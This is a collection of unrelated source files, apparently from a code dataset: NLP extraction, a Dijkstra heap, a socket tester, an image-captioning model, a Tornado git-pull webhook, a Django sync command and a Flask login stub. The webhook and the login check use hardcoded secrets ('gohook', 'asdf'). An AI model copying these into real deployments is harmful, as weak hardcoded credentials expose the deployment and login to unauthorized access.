if (k<len(wordList)) and ('/PERSON' in wordList[k] or '/person' in wordList[k]):
if (k+1<len(wordList)) and ('/person' in wordList[k+1] or '/person' in wordList[k+1]):
if (k+2<len(wordList)) and ('/person' in wordList[k+2] or '/person' in wordList[k+2]):
first=wordList[k]
first=first[:-7]
second=wordList[k+1]
second=second[:-7]
third=wordList[k+2]
third=third[:-7]
person=first+" "+second+" "+third
k=k+2
else:
first=wordList[k]
first=first[:-7]
second=wordList[k+1]
second=second[:-7]
person=first+" "+second
k=k+1
else:
person=wordList[k]
person=person[:-7]
if person not in dictPerson:
dictPerson[person.lower()]=1
if (k<len(wordList)) and ('/DATE' in wordList[k] or '/date' in wordList[k]):
if (k+1<len(wordList)) and ('/DATE' in wordList[k+1] or '/date' in wordList[k+1]):
first=wordList[k]
first=first[:-5]
second=wordList[k+1]
second=second[:-5]
date=first+" "+second
k=k+1
else:
date=wordList[k]
date=date[:-5]
if date not in dictDate:
dictDate[date.lower()]=1
if (k<len(wordList)) and ('/ORGANIZATION' in wordList[k] or '/oraganization' in wordList[k]):
if (k+1<len(wordList)) and ('/ORGANIZATION' in wordList[k+1] or '/organization' in wordList[k+1]):
first=wordList[k]
first=first[:-13]
second=wordList[k+1]
second=second[:-13]
organization=first+" "+second
k=k+1
else:
organization=wordList[k]
organization=organization[:-13]
if organization not in dictOrganization:
dictOrganization[organization.lower()]=1
###########################################################################################################
#mark process flag in currWindowProcessedFlag
#currWindowProcessedFlag[i]=1
#write into file relevance info
#relevanceDict[relID]=relevanceFlag
#prevWindowProcessedFlag=currWindowProcessedFlag[:]
#print dictPerson
#print dictLocation
#print dictOrganization
#print dictDate
completeName = os.path.join(extracted_info_path, filename)
file1 = open(completeName, "w")
#write published date and title
file1.write(published_date[filename])
file1.write('\n'+titleDict[filename])
#write person
if any(dictPerson):
items = sorted(dictPerson.items(), key=get_count, reverse=True)
firstWordFlag=1
for item in items[:5]:
if firstWordFlag == 1:
file1.write(item[0])
firstWordFlag=0
else:
file1.write(', '+item[0])
else:
file1.write('None') # '\n' not required as title string end with \n
#write date
if any(dictDate):
file1.write('\n')
firstWordFlag=1
for word,freq in dictDate.items():
if firstWordFlag == 1:
file1.write(word)
firstWordFlag=0
else:
file1.write(', '+word)
else:
file1.write('\n'+published_date[filename])
#write organization
if any(dictOrganization):
file1.write('\n')
items=[]
items = sorted(dictOrganization.items(), key=get_count, reverse=True)
firstWordFlag=1
for item in items[:5]:
if firstWordFlag == 1:
file1.write(item[0])
firstWordFlag=0
else:
file1.write(', '+item[0])
else:
file1.write('\nNone')
#write location
if any(dictLocation):
file1.write('\n')
firstWordFlag=1
for word,freq in dictLocation.items():
if firstWordFlag == 1:
file1.write(word)
firstWordFlag=0
else:
file1.write(', '+word)
else:
file1.write('\nNone')
file1.close()
| neeleshkshukla/PlannedEventForecasting | 3_Information_Extraction/Code/Python/informationExtraction.py | informationExtraction.py | py | 13,329 | python | en | code | 0 | github-code | 90 |
import sys
import os.path
class colaPrioridad():
    """Min-priority queue backed by a binary min-heap of [label, value] pairs."""
    def __init__(self):
        self.minHeap = MinHeap()
    # Insert a (label, priority) pair.
    def inserta(self,key,value):
        self.minHeap.push(key,value)
    # Return the [label, value] pair with the smallest value (no removal).
    def encuentraMin(self):
        return self.minHeap.peek()
    # Remove the minimum entry; the popped value is discarded.
    def borraMin(self):
        temp = self.minHeap.pop()
    # True when the queue holds no entries.
    def vacio(self):
        return self.minHeap.esVacia()
    # Remove the entry whose label equals `key`.
    def elimina(self,key):
        self.minHeap.eliminaPorEtiqueta(key)
    # Alias of encuentraMin: peek at the minimum entry.
    def minQ(self):
        return self.minHeap.peek()
    # Lower the priority of `key` to `value`; no-op when the label is absent.
    # NOTE(review): assumes `value` is not larger than the stored priority.
    def decrementaLlave(self,key,value):
        x = self.minHeap.encuentraValor(key)
        if x == -1:# label not found, so nothing to do
            return
        #if value < self.minHeap[x][1]:
        self.minHeap.cambioValor(x,value)
class MinHeap:
    """Array-backed binary min-heap of [label, value] entries, ordered by value."""
    def __init__(self):
        self.heap = [] # entries have the form ['label', distance]
    # True when the heap holds no entries.
    def esVacia(self):
        if self.heap == []:
            return True
        return False
    # Index of the parent of node i.
    def getPadre(self, i):
        return int((i-1)/2)
    # Index of the left child of node i.
    def getIzquierdo(self, i):
        return 2*i+1
    # Index of the right child of node i.
    def getDerecho(self, i):
        return 2*i+2
    def tienePadre(self, i):
        return self.getPadre(i) < len(self.heap)
    def tieneIzquierdo(self, i):
        return self.getIzquierdo(i) < len(self.heap)
    def tieneDerecho(self, i):
        return self.getDerecho(i) < len(self.heap)
    # Append the new [label, key] entry and sift it up into place.
    def push(self, etiqueta,llave):
        self.heap.append([etiqueta,llave])
        self.heapify(len(self.heap) - 1)
    # Remove and return the minimum entry, or None when empty.
    def pop(self):
        if self.esVacia():
            return None
        if len(self.heap) == 1:
            temp = self.heap[0]
            self.heap = []
            return temp
        # Move the last entry to the root and sift it down.
        temp = self.heap[0]
        ultimo = len(self.heap) - 1
        self.heap[0] = self.heap[ultimo]
        del self.heap[ultimo]
        self.heapifyPop(0)
        return temp
    # Index of the smaller child of node i, or -1 when i is a leaf.
    def hijoMin(self,i):
        derecho = self.getDerecho(i)
        izquierdo = self.getIzquierdo(i)
        tamanio = len(self.heap)
        if derecho < tamanio and izquierdo < tamanio:
            if self.heap[izquierdo][1] < self.heap[derecho][1]:
                return izquierdo
            else:
                return derecho
        elif derecho < tamanio and izquierdo >= tamanio:
            return derecho
        elif izquierdo < tamanio and derecho >= tamanio:
            return izquierdo
        else:# no children
            return -1
    # Sift the entry at `posicion` down until the heap property holds.
    def heapifyPop(self,posicion):# entries are [label, value]
        hijomin = self.hijoMin(posicion)
        # `posicion` has no children, so we are done
        if hijomin == -1:
            return
        # it has at least one child
        if self.heap[hijomin][1] < self.heap[posicion][1]:
            self.heap[hijomin],self.heap[posicion] = self.heap[posicion],self.heap[hijomin]
            self.heapifyPop(hijomin)
    # Return the minimum entry without removing it, or None when empty.
    def peek(self):
        if self.esVacia():
            return None
        return self.heap[0]
    # Sift the entry at index i up while it is smaller than its parent.
    def heapify(self, i):
        while(self.tienePadre(i) and self.heap[i][1] < self.heap[self.getPadre(i)][1]):
            self.heap[i], self.heap[self.getPadre(i)] = self.heap[self.getPadre(i)], self.heap[i]
            i = self.getPadre(i)
    # Debug helper: dump the raw backing list.
    def imprimeHeap(self):
        print(self.heap)
    # Linear scan for the entry whose label matches; -1 when absent.
    def encuentraValor(self,etiqueta):
        for x in range(0,len(self.heap)):
            if self.heap[x][0] == etiqueta:
                return x
        return -1
    # Remove the entry with the given label: swap with the last entry, drop
    # it, then restore the heap property by sifting up or down.
    # NOTE(review): if the removed entry occupied the last slot, self.heap[x]
    # may index past the shortened list afterwards -- verify callers.
    def eliminaPorEtiqueta(self,etiqueta):
        x = self.encuentraValor(etiqueta)
        self.heap[x],self.heap[-1] = self.heap[-1],self.heap[x]
        del self.heap[-1]
        if self.tienePadre(x):
            if self.heap[x][1] < self.heap[self.getPadre(x)][1]:
                self.heapify(x)
                return
        self.heapifyPop(x)
    # Only meant to be used when the new value is smaller than the stored one.
    def cambioValor(self,posicion,valor):
        self.heap[posicion][1] = valor
        self.heapify(posicion)
def Dijkstra(inicio,tabla,vertices):
    """Single-source shortest paths (Dijkstra).
    Args:
        inicio: label of the start node.
        tabla: dict label -> [predecessor, distance, visited, permanent].
        vertices: adjacency dict label -> list of [neighbor, weight] pairs.
    Returns:
        The same ``tabla`` dict, filled with predecessors and distances.
    """
    tabla[inicio][1] = 0
    tabla[inicio][2] = True
    tabla[inicio][3] = True
    # Seed the queue with the start node's direct neighbors.
    cola = colaPrioridad()
    for x in vertices[inicio]:
        cola.inserta(x[0],x[1])
        tabla[x[0]][1] = x[1]
        tabla[x[0]][0] = inicio
        tabla[x[0]][2] = True
    #cola.minHeap.imprimeHeap()
    #print(tabla)
    #i = 0
    while not cola.vacio():
        # Settle the closest pending node and relax its outgoing edges.
        minimo = cola.encuentraMin()
        cola.borraMin()
        tabla[minimo[0]][3] = True
        for x in vertices[minimo[0]]:
            if tabla[x[0]][3] == False:# already permanent? then skip this neighbor
                if tabla[x[0]][2] == False:# first time this node is reached
                    tabla[x[0]][0] = minimo[0]
                    tabla[x[0]][1] = minimo[1] + x[1]
                    tabla[x[0]][2] = True
                    cola.inserta(x[0],minimo[1] + x[1])
                else:# seen before: relax when a shorter path appears
                    if tabla[x[0]][1] > minimo[1] + x[1]:
                        cola.decrementaLlave(x[0],minimo[1] + x[1])
                        tabla[x[0]][1] = minimo[1] + x[1]
                        tabla[x[0]][0] = minimo[0]
        #i = i + 1
        #print(tabla)
    return tabla
def auxiliarSalida(tabla):
    """Convert each node's accumulated shortest-path distance into the weight
    of the edge to its predecessor, in place.

    ``tabla`` maps label -> [predecessor, distance, ...]; the root (empty
    predecessor) is left untouched.
    """
    distancias = {nodo: datos[1] for nodo, datos in tabla.items()}
    for datos in tabla.values():
        padre = datos[0]
        if padre != '':
            datos[1] = datos[1] - distancias[padre]
def salida(tabla):
    """Write the shortest-path tree to salida.txt.
    First line: all node labels, comma separated. Then one 'node,parent,weight'
    line per reachable non-root node (weight = edge weight to the parent, as
    produced by auxiliarSalida).
    Fix: the old code pre-created the file via open(..., "x") / open(..., "w")
    and leaked the first file handle; a single open in "w" mode both creates
    and truncates the file, and the context manager guarantees it is closed.
    """
    auxiliarSalida(tabla)
    lineas = [",".join(tabla.keys())]
    for nodo in tabla.keys():
        # The source node and disconnected nodes keep an empty parent and are
        # excluded from the result, as before.
        if tabla[nodo][0] != '':
            lineas.append("{},{},{}".format(nodo, tabla[nodo][0], str(tabla[nodo][1])))
    with open("salida.txt", "w") as f:
        f.write("\n".join(lineas) + "\n")
def main():
    """Read the graph file named on the command line and run Dijkstra.
    Line 1 lists the node labels (comma/space separated; the first label is
    the source). Each following line is an edge 'a,b,weight'. The graph is
    undirected. Results are written to salida.txt via salida().
    """
    f = open(sys.argv[1],"r")
    linea = f.readlines()
    vertices = {}
    tabla = {}
    # Empty input: emit an empty result file and stop.
    if linea == []:
        salida(tabla)
        return
    numero = ""
    contador_inicio = 0
    inicio = ""
    i = 0
    # Parse the header line character by character, collecting node labels.
    while i < len(linea[0]):
        if linea[0][i] == ',' or linea[0][i] == ' ' or linea[0][i] == '\n':
            if contador_inicio == 0:
                inicio = numero
            vertices[numero] = []
            tabla[numero] = ['',sys.maxsize,False,False]
            numero = ""
            i = i+1
            contador_inicio = contador_inicio + 1
        else:
            numero = numero + linea[0][i]
            i = i + 1
    #print(tabla)
    # Each remaining line is an edge "a,b,weight"; split it manually.
    for i in range(1,len(linea)):
        temp = linea[i]
        j = 0
        valor1 = ""
        valor2 = ""
        valor3 = ""
        while temp[j] != ',':
            valor1 = valor1 + temp[j]
            j = j + 1
        j = j + 1
        while temp[j] != ',':
            valor2 = valor2 + temp[j]
            j = j + 1
        j = j + 1
        while temp[j] != '\n':
            valor3 = valor3 + temp[j]
            j = j + 1
        # Add the edge to both endpoints' adjacency lists (undirected graph).
        valor3 = int(valor3)
        vertices[valor1].append([valor2,valor3])
        vertices[valor2].append([valor1,valor3])
    #print(vertices)
    f.close()
    salida(Dijkstra(inicio,tabla,vertices))
    #print(tabla)
    #print(inicio)
    #salida(tabla)
#print(inicio)
#salida(tabla)
if __name__ == '__main__':
main()
#print(sys.maxsize)
| IsayDBS/Analisis_de_algoritmos | Practica4/Isay_Balderas/src/Main.py | Main.py | py | 7,761 | python | es | code | 0 | github-code | 90 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf.urls import url
from .views import LicenseDetailView
# Route table: detail page for a single license, addressed by its slug.
urlpatterns = [
    url(
        r"^license/(?P<slug>[-\w]+)/$",
        LicenseDetailView.as_view(),
        name="alibrary-license-detail",
    )
]
| digris/openbroadcast.org | website/apps/alibrary/urls_license.py | urls_license.py | py | 286 | python | en | code | 9 | github-code | 90 |
import sys
input = sys.stdin.readline
if __name__ == "__main__":
N = list(map(str, input().strip()))
room = [0 for _ in range(9)]
pack = [1, 1, 1, 1, 1, 1, 2, 1, 1]
for i in range(len(N)):
if N[i] == "9":
room[6] += 1
else:
room[int(N[i])] += 1
for i in range(1, 10):
temp = [i for _ in range(9)]
comp = [x * y for x, y in zip(temp, pack)]
flag = False
for j in range(9):
if comp[j] < room[j]:
flag = True
break
if flag == False:
print(i)
exit(0)
| WonyJeong/algorithm-study | WonyJeong/implementation/1475.py | 1475.py | py | 620 | python | en | code | 2 | github-code | 90 |
# Pyramid
import colander
import deform
from pyramid.httpexceptions import HTTPBadRequest
from pyramid.httpexceptions import HTTPFound
# Websauna
from websauna.system.core import messages
from websauna.system.core.route import simple_route
from websauna.system.core.sitemap import include_in_sitemap
from websauna.system.core.utils import get_secrets
from websauna.system.form.schema import CSRFSchema
from websauna.system.http import Request
from .mailgun import Mailgun
class NewsletterSubscriptionSchema(CSRFSchema):
    """Newsletter subscription schema.

    Bug fix: the fields were declared as ``colander.Schema(...)`` —
    ``colander.Schema`` is a *mapping* schema class, so each field became a
    mapping node with a stray String child and would never deserialize the
    submitted string values. Leaf fields must be ``colander.SchemaNode``.
    """

    # Subscriber email address, validated as a well-formed email.
    email = colander.SchemaNode(colander.String(), validator=colander.Email())
    # URL to redirect back to after the form is processed.
    came_from = colander.SchemaNode(colander.String(), validator=colander.url)
def subscribe_email(request: Request, email: str):
    """Upsert *email* onto the site's default Mailgun mailing list.

    An existing member's subscription status is left untouched
    (``upsert`` semantics).
    """
    registry = request.registry
    mailing_list = get_secrets(registry)["mailgun.mailing_list"]
    payload = {
        "address": email,
        "email": email,
        "upsert": "yes",
    }
    return Mailgun(registry).update_subscription(mailing_list, payload)
@simple_route("/subscribe-newsletter", route_name="subscribe_newsletter")
@include_in_sitemap(False)
def subscribe_newsletter(request: Request):
"""Newsletter Subscription view."""
schema = NewsletterSubscriptionSchema().bind(request=request)
form = deform.Form(schema)
# In case of validation error, we return the user to the form
came_from = request.referer or request.route_url('home')
if request.method != "POST":
return HTTPBadRequest("POST-only endpoint")
# User submitted this form
if 'subscribe' in request.POST:
try:
appstruct = form.validate(request.POST.items())
email = appstruct["email"]
came_from = appstruct["came_from"]
subscribe_email(request, email)
# Thank user and take them to the next page
msg = "<strong>{email}</strong> has been subscribed to the newsletter.".format(email=email)
msg_class = 'info'
messages.add(request, kind=msg_class, msg=msg, html=True)
except deform.ValidationFailure:
# Render a form version where errors are visible next to the fields,
# and the submitted values are posted back
msg = "Email was not valid."
msg_class = 'error'
messages.add(request, kind=msg_class, msg=msg)
return HTTPFound(came_from)
else:
# We don't know which control caused form submission
return HTTPBadRequest("Unknown form button pressed")
| websauna/websauna.newsletter | websauna/newsletter/views.py | views.py | py | 2,692 | python | en | code | 1 | github-code | 90 |
# Echo client program
import socket
import sys
#HOST = '70.186.140.93'
HOST = 'mber.pub.playdekgames.com' # The remote host
PORT = 9601
s = None
print( ' Connection test utility' )
print( '@ 2014 Mickey Kawick' )
print( 'address {0}:{1}'.format( HOST, PORT ) );
print( '................................' )
print( 'Connecting...' )
# Try every (family, socktype) candidate returned by getaddrinfo — covers
# both IPv4 and IPv6 — until one socket can be created AND connected.
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except socket.error as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except socket.error as msg:
        # Connection failed for this candidate address; try the next one.
        s.close()
        s = None
        continue
    break
# s is still None when every candidate address failed.
if s is None:
    print( 'could not open socket' )
    sys.exit(1)
else:
    print( 'connection was fine' )
    s.close()
print( '................................' )
print( 'execution complete...' ) | mkawick/tcp_testing | ErrorCheckingClient.py | ErrorCheckingClient.py | py | 901 | python | en | code | 0 | github-code | 90 |
import torch
import torch.nn as nn
import torchvision.models as models
from torch.nn.utils.rnn import pack_padded_sequence
class EncoderCNN(nn.Module):
    """Image encoder: frozen pretrained ResNet-50 plus a trainable embedding layer."""
    def __init__(self, embed_size):
        super(EncoderCNN, self).__init__()
        resnet = models.resnet50(pretrained=True)
        # Freeze the CNN backbone; only the final embedding layer is trained.
        for param in resnet.parameters():
            param.requires_grad_(False)
        # Drop ResNet's final fc classification layer; keep conv stack + pooling.
        modules = list(resnet.children())[:-1]
        self.resnet = nn.Sequential(*modules)
        self.embed = nn.Linear(resnet.fc.in_features, embed_size)
    def forward(self, images):
        # Pooled CNN features -> flatten per sample -> project to embed_size.
        features = self.resnet(images)
        features = features.view(features.size(0), -1)
        features = self.embed(features)
        return features
class DecoderRNN(nn.Module):
    """LSTM caption decoder: image features + word embeddings -> vocabulary logits."""
    def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):
        super(DecoderRNN, self).__init__()
        self.embed = nn.Embedding(vocab_size, embed_size)
        self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first=True)
        self.linear = nn.Linear(hidden_size, vocab_size)
    def forward(self, features, captions):
        """Teacher-forced decoding.
        Args:
            features: (batch, embed_size) image features from the encoder.
            captions: (batch, seq_len) token ids ending with the <end> token.
        Returns:
            (batch, seq_len, vocab_size) logits.
        """
        # Drop the last token's embedding: feeding <end> into the LSTM would
        # only predict a word *after* the caption, which is never scored.
        # (Replaces the previous narrow()-with-temp-list dance.)
        embeddings = self.embed(captions)[:, :-1, :]
        # Prepend the image features as the first "word" of the input sequence.
        inputs = torch.cat((features.unsqueeze(1), embeddings), dim=1)
        # nn.LSTM returns (output_sequence, (h_n, c_n)); the old code named
        # these "hidden, output", which was backwards and misleading.
        lstm_out, _ = self.lstm(inputs)
        return self.linear(lstm_out)
    def sample(self, inputs, states=None, max_len=20):
        """Greedy decoding: return a list of up to ``max_len`` predicted token ids.
        Args:
            inputs: (1, 1, embed_size) pre-processed image feature tensor.
            states: optional initial LSTM state.
            max_len: maximum caption length. Bug fix: this parameter was
                previously ignored in favor of a hard-coded range(20).
        """
        sampled_ids = []
        for _ in range(max_len):
            lstm_out, states = self.lstm(inputs, states)
            logits = self.linear(lstm_out.squeeze(1))
            predicted = logits.max(1)[1]
            sampled_ids.append(predicted.item())
            # Feed the predicted word back in as the next input step.
            inputs = self.embed(predicted).unsqueeze(1)
        return sampled_ids
class InsertionSort:
    """Small practice collection: insertion sort plus two LeetCode exercises."""
    def my_insert_sort(self, nums: list) -> None:
        """Sort ``nums`` in place with insertion sort; prints before/after."""
        print("Unsorted: ", nums)
        # Grow a sorted prefix: sink each new element leftwards into place.
        # (The early exit in the inner loop avoids the original's useless
        # full scan of the already-sorted prefix; the result is identical.)
        for p in range(1, len(nums)):
            temp = p
            while temp > 0 and nums[temp] < nums[temp - 1]:
                nums[temp], nums[temp - 1] = nums[temp - 1], nums[temp]
                temp -= 1
        print("Sorted: ", nums)
    def lengthOfLastWord(self, s: str) -> int:
        """Return the length of the last whitespace-separated word in ``s``
        (0 when there is none).
        Bug fix: the original printed the split and always returned 1.
        """
        words = s.split()
        return len(words[-1]) if words else 0
    def searchInsert(self, nums: list, target: int) -> int:
        """Binary search: index of ``target`` in sorted ``nums``, or the index
        where it would be inserted to keep the list sorted.
        Bug fix: on an exact match the original returned ``former`` (the lower
        bound) instead of ``mid``, which is wrong whenever former < mid
        (e.g. searchInsert([1, 3, 5, 6], 3) returned 0 instead of 1).
        """
        former, latter = 0, len(nums) - 1
        while former <= latter:
            mid = (former + latter) // 2
            if nums[mid] == target:
                return mid
            elif nums[mid] < target:
                former = mid + 1
            else:
                latter = mid - 1
        # target absent: former is the insertion point.
        return former
# Ad-hoc manual test driver (earlier experiments left commented out).
ii = InsertionSort()
# ii.my_insert_sort([2, 4, 1, 6, 7, 9, 3, 8, 5])
# print(ii.lengthOfLastWord(" fly me to the moon "))
# print(ii.lengthOfLastWord("a"))
print(ii.searchInsert([1, 3, 5, 6], 4))
#!/usr/bin/env python
# -*- coding: utf-8 -*
# gohook @ Python
# Functions: WebHook自动部署代码
# Created By HavenShen on 2016-04-05,Version 0.1
import comm_log
import subprocess
import json
import tornado.ioloop
import tornado.web
import tornado.options
from tornado.options import define, options
#监听端口
define("port", default=8765, help="run on the given port", type=int)
#日志输出
define("log", default=comm_log.get_logging('gohook'))
#希望自动部署项目路径
file_path = '/home/wwwroot/xxx'
def pull():
    """Run ``git pull`` in the deploy directory and return its exit code.
    Fix: the exit code of the child process was silently discarded, so a
    failed pull still logged "git pull done." upstream. A non-zero code is
    now logged and returned (returning a value is backward compatible:
    existing callers ignore the previous implicit None).
    """
    cmd = ['git', 'pull']
    p = subprocess.Popen(cmd, cwd=file_path)
    returncode = p.wait()
    if returncode != 0:
        options.log.info('git pull failed with exit code %s' % returncode)
    return returncode
class MainHandler(tornado.web.RequestHandler):
    """Webhook endpoint: a POST carrying the correct token triggers a git pull."""
    def get(self):
        # Simple liveness check.
        self.write('get done.')
    def post(self):
        data = tornado.escape.json_decode(self.request.body)
        # Fix: use .get() so a payload without a 'token' key is rejected via
        # the normal error branch instead of raising KeyError (HTTP 500).
        if data.get('token') == 'gohook':
            pull()
            options.log.info('git pull done.')
        else:
            options.log.info('git pull error.[token is false]')
        self.write('post done.')
# Single-route application: POST /gohook with the deploy token pulls the repo.
application = tornado.web.Application([
    (r"/gohook", MainHandler),
])
# Start the HTTP server when executed directly.
if __name__ == "__main__":
    application.listen(options.port)
    tornado.ioloop.IOLoop.instance().start()
| HavenShen/gohook | main.py | main.py | py | 1,118 | python | en | code | 51 | github-code | 90 |
import sys
# BOJ "swap balls": read n baskets and m swap operations from stdin,
# apply each swap, and print the final arrangement.
read = sys.stdin.readline
n, m = map(int, read().split())
# Keep the balls as strings so the final join needs no conversion.
balls = [str(number) for number in range(1, n + 1)]
for _ in range(m):
    a, b = map(int, read().split())
    # Tuple assignment swaps the two baskets in place (1-based input).
    balls[a - 1], balls[b - 1] = balls[b - 1], balls[a - 1]
print(' '.join(balls))
72604514537 | """
DO NOT RUN IN PRODUCTION
Updates a local db with data on the current production site.
"""
from __future__ import unicode_literals
import json
import requests
from dateutil import parser
from tempfile import NamedTemporaryFile
from django.conf import settings
from django.core.files import File
from django.core.management.base import BaseCommand, CommandError
from django.template.defaultfilters import slugify
from classes.models import ApeClass
from events.models import Event
from pages.models import Page, Widget, PersonFocusWidget, TextWidget, ImageCarouselItem, ImageCarouselWidget, \
ApeClassesWidget, BannerWidget, EventsWidget, PeopleWidget, HouseTeamFocusWidget, PressClippingWidget
from people.models import Person, HouseTeam, HouseTeamMembership
PAGES_TO_CREATE = [
'home',
'classes',
'shows',
'talent',
'faculty',
'houseteams',
'hype',
]
BASE_URL = 'https://theapetheater.org'
UNSUPPORTED_WIGDET_TYPES = ['audio', 'videoswidget', 'video_focus']
class Command(BaseCommand):
def create_person_from_json(self, person_json):
first, last = person_json['name'].split(' ')
person, created = Person.objects.get_or_create(first_name=first, last_name=last)
if created:
print('Created new person: {}'.format(person))
if not person.headshot.name or person.headshot.name == '':
try:
image_url = '{}{}'.format(BASE_URL, person_json['image'])
except KeyError:
image_url = '{}{}'.format(BASE_URL, person_json['image_url'])
image = requests.get(image_url)
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(image.content)
img_temp.flush()
person.headshot = None
person.headshot.save('{}.jpg'.format(slugify(person_json['name'])), File(img_temp), save=True)
person.bio = person_json['bio']
person.save()
return person
def create_person_focus_widget_from_json(self, focus_json):
first, last = focus_json['person']['name'].split(' ')
person = Person.objects.filter(first_name=first, last_name=last).first()
if not person:
person = self.create_person_from_json(focus_json['person'])
widget, created = PersonFocusWidget.objects.get_or_create(name='{}'.format(person.last_name), person=person)
return widget
def create_house_team_focus_widget_from_json(self, focus_json):
team_name = focus_json['house_team']['name']
team, created = HouseTeam.objects.get_or_create(name=team_name)
if 'logo' in focus_json['house_team']:
banner_url = '{}{}'.format(BASE_URL, focus_json['house_team']['logo']['image']['url'])
team.banner = self.create_banner_widget_from_url(banner_url, team.name)
if 'performers' in focus_json['house_team']:
for performer in focus_json['house_team']['performers']:
first, last = performer['name'].split(' ')
try:
person = Person.objects.get(first_name=first, last_name=last)
except Person.DoesNotExist:
print('House team {} references performer {}, who has not been created yet.'.format(team.name, performer['name']))
continue
HouseTeamMembership.objects.get_or_create(house_team=team, person=person)
print('added {} to {}'.format(person, team))
if 'image_carousel' in focus_json['house_team']:
team.image_carousel = self.create_carousel_widget_from_json(focus_json['house_team']['image_carousel'])
team.show_time = focus_json['house_team']['show_time']
team.save()
widget, created = HouseTeamFocusWidget.objects.get_or_create(name='{}'.format(team.name), house_team=team)
return widget
def create_class_from_json(self, class_json):
ape_class, created = ApeClass.objects.get_or_create(name=class_json['name'], price=class_json['price'])
if created:
print('created new ape class: {}'.format(ape_class.name))
ape_class.class_type = class_json['type']
ape_class.num_sessions = class_json['num_sessions']
ape_class.bio = class_json['bio']
ape_class.price = class_json['price']
ape_class.class_length = class_json['class_length']
ape_class.start_date = parser.parse(class_json['start_date'])
if ape_class.banner is None:
image_url = '{}{}'.format(BASE_URL, class_json['image'])
banner = self.create_banner_widget_from_url(url=image_url, name=ape_class.name)
ape_class.banner = banner
ape_class.save()
return ape_class
def create_show_from_json(self, show_json):
show, created = Event.objects.get_or_create(name=show_json['name'],
start_time=parser.parse(show_json['start_time']),
ticket_price=show_json['ticket_price'])
show.bio = show_json['bio']
if show.banner is None:
image_url = '{}{}'.format(BASE_URL, show_json['image'])
show.banner = self.create_banner_widget_from_url(image_url, show.name)
show.save()
return show
def create_text_widget_from_json(self, widget_json):
text_widget, created = TextWidget.objects.get_or_create(name=widget_json['name'])
text_widget.content = widget_json['text']
text_widget.text_color = widget_json['text_color']
text_widget.width = widget_json['width']
text_widget.save()
return text_widget
def create_press_clipping_widget_from_json(self, widget_json):
press_widget, created = PressClippingWidget.objects.get_or_create(name=widget_json['name'])
press_widget.content = widget_json['text']
press_widget.text_color = widget_json['text_color']
press_widget.background_color = widget_json['background_color']
press_widget.author = widget_json['author']
press_widget.external_link = widget_json['external_link']
press_widget.width = widget_json['width']
press_widget.save()
return press_widget
def create_carousel_widget_from_json(self, widget_json):
carousel_widget, created = ImageCarouselWidget.objects.get_or_create(name=widget_json['name'])
carousel_widget.width = widget_json['width']
for count, image in enumerate(widget_json['images']):
item, created = ImageCarouselItem.objects.get_or_create(carousel=carousel_widget, sort_order=count)
item.path = image['path']
image_url = '{}{}'.format(BASE_URL, image['image']['url'])
image = requests.get(image_url)
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(image.content)
img_temp.flush()
item.image = None
item.image.save('{}.jpg'.format(item.id), File(img_temp), save=True)
print('added ImageCarouselItem {} to the {} Image Carousel'.format(item.id, carousel_widget.name))
return carousel_widget
def create_banner_widget_from_url(self, url, name):
image = requests.get(url)
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(image.content)
img_temp.flush()
banner_widget = BannerWidget.objects.create(name=name)
banner_widget.image.save('{}.jpg'.format(name), File(img_temp), save=True)
print('added new banner: {}'.format(banner_widget.name))
return banner_widget
def create_widget_from_json(self, widget_json):
widget_type = widget_json['type']
if widget_type in UNSUPPORTED_WIGDET_TYPES:
print('skipping audio/video widget: {}'.format(widget_json['name']))
return None
elif widget_type == 'text':
widget = self.create_text_widget_from_json(widget_json)
elif widget_type == 'image_carousel':
widget = self.create_carousel_widget_from_json(widget_json)
elif widget_type == 'person_focus':
widget = self.create_person_focus_widget_from_json(widget_json)
elif widget_type == 'house_team_focus':
widget = self.create_house_team_focus_widget_from_json(widget_json)
elif widget_type == 'press_clipping':
widget = self.create_press_clipping_widget_from_json(widget_json)
elif widget_json['item_type'] is not None:
if widget_json['item_type'] == 'ape_class':
widget, created = ApeClassesWidget.objects.get_or_create(name=widget_json['name'])
widget.display_type = widget_type
widget.width = widget_json['width']
widget.type = widget_json['type']
for item in widget_json['items']:
ape_class = self.create_class_from_json(item)
widget.ape_classes.add(ape_class)
elif widget_json['item_type'] == 'event':
widget, created = EventsWidget.objects.get_or_create(name=widget_json['name'])
widget.display_type = widget_type
widget.width = widget_json['width']
widget.type = widget_json['type']
widget.upcoming_events = widget_json['upcoming_events']
widget.upcoming_events_window = widget_json['upcoming_events_window']
widget.save()
for item in widget_json['items']:
show = self.create_show_from_json(item)
elif widget_json['item_type'] == 'person':
widget, created = PeopleWidget.objects.get_or_create(name=widget_json['name'])
widget.display_type = widget_type
widget.width = widget_json['width']
widget.type = widget_json['type']
widget.save()
for item in widget_json['items']:
person = self.create_person_from_json(item)
widget.people.add(person)
else:
widget = None
return widget
def update_slugged_page(self, slug):
page, created = Page.objects.get_or_create(name=slug, slug=slug)
page.page_to_widgets.all().delete()
page_url = '{}/api/{}.json'.format(BASE_URL, slug)
response = requests.get(page_url)
response_json = json.loads(response.content.decode())
for widget_json in response_json['widgets']:
widget = self.create_widget_from_json(widget_json)
if widget:
page.add_widget(widget)
print('added {} to the {} page'.format(widget, slug))
def handle(self, *args, **options):
# disallow running in production
if settings.DEBUG:
Page.objects.all().delete()
Widget.objects.all().delete()
for slug in PAGES_TO_CREATE:
print('UPDATING: {} page'.format(slug))
self.update_slugged_page(slug)
print('Finished updating {} page\n'.format(slug))
# we create just the Ape TV page, downloading its video widgets and
# reuploading them would take quite a while
page, created = Page.objects.get_or_create(name='Ape TV', slug='apetv')
| zachcalvert/the_ape_theater | the_ape/pages/management/commands/update_local.py | update_local.py | py | 11,368 | python | en | code | 3 | github-code | 90 |
3588013289 | from flask import Flask, request, redirect
app = Flask(__name__, static_url_path='')
@app.route('/',methods=["POST", "GET"])
def index():
return app.send_static_file('index.html')
@app.route('/login', methods=["POST", "GET"])
def login():
if (request.method == "POST"):
req=request.form
print(req)
if req['lpw']=="asdf":
return redirect('minecraft.html')
